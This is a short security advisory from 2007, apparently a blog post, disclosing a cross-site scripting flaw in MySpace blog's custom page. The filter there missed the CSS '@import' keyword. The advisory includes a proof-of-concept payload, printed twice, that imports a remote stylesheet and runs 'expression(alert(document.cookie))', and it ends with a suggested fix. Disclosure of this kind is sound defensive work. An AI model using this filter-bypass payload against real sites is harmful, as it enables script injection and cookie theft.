[Advisory]myspace blog xss vulnerability
by luoluo (luoluonet_at_hotmail.com||luoluonet_at_126.com)
http://www.ph4nt0m.org
2007-3-24
- description
There's a xss vulnerability in customize page of myspace blog.
User can submit html and css codes in this page, script is filtered, but css keyword
"@import" isn't filtered. So we can inject script by import a css file remotely.
- poc
Head HTML textarea:
<div id="test">aaa</div>
Custom Style Sheet:
@import url(http://www.yoursite.com/test.css);
test.css:
#test {width: expression(alert(document.cookie));}
<div id="test">aaa</div>
Custom Style Sheet:
@import url(http://www.yoursite.com/test.css);
test.css:
#test {width: expression(alert(document.cookie));}
- solution
Filter the css keyword "@import", but the xss blacklist will never rich the end :)
没有评论:
发表评论